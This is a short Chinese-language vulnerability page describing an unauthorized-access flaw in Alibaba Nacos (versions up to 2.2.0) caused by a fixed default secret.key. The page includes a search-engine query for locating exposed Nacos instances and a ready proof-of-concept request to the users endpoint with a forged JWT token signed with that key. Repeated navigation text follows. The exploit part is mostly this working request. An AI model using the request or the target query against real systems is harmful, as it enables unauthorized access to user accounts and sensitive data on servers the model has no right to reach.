Alibaba Nacos secret.key默认密钥未授权访问漏洞

# Alibaba Nacos secret.key默认密钥未授权访问漏洞 ## 漏洞描述 Alibaba Nacos 使用了固定的secret.key默认密钥，导致攻击者可以构造请求获取敏感信息，导致未授权访问漏洞 ## 漏洞...

Alibaba Nacos secret.key默认密钥未授权访问漏洞

漏洞描述

Alibaba Nacos 使用了固定的secret.key默认密钥，导致攻击者可以构造请求获取敏感信息，导致未授权访问漏洞

漏洞影响

Alibaba Nacos <= 2.2.0

网络测绘

app="NACOS"

漏洞复现

登陆页面

漏洞原因是由于使用了固定的Key

验证POC

/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9

发表于 2024-07-12 18:45:43
阅读 ( 2477 )
分类：Web应用

站长统计

Alibaba Nacos secret.key默认密钥未授权访问漏洞

Alibaba Nacos secret.key默认密钥未授权访问漏洞

漏洞描述

漏洞影响

网络测绘

漏洞复现

0 条评论

目录

Alibaba Nacos secret.key默认密钥 未授权访问漏洞

Alibaba Nacos secret.key默认密钥 未授权访问漏洞

漏洞描述

漏洞影响

网络测绘

漏洞复现

0 条评论

目录

Alibaba Nacos secret.key默认密钥未授权访问漏洞

Alibaba Nacos secret.key默认密钥未授权访问漏洞